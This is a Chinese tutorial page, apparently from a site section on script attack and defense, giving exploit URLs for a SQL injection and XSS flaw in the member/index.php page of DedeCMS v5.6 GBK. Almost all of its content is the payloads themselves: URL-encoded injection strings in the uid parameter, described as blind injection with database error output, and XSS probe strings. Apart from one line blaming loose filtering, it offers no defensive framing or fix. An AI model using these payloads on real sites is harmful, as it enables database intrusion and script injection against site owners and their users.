dedecms v5.6 GBK 注入漏洞利用(member/index.php)_脚本攻防教程-查字典教程网
dedecms v5.6 GBK 注入漏洞利用(member/index.php)
dedecms v5.6 GBK 注入漏洞利用(member/index.php)
发布时间:2016-12-21 来源:查字典编辑
摘要:EXP:htp://127.0.0.1/member/index.php?uid='%20||%20''%20...

EXP:

htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

会员中心首页(../member/index.php)函数过滤不严格造成盲注,数据库错误模式,XSS

EXP:

htp://127.0.0.1/member/index.php?uid='%20||%20''%20||%20'%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7';

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7WFXSSProbe'")/>

htp://127.0.0.1/member/index.php?uid=%E6%B6%9B%E5%A3%B0%E4%BE%9D%E6%97%A7'">

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新脚本攻防学习
    热门脚本攻防学习
    子分类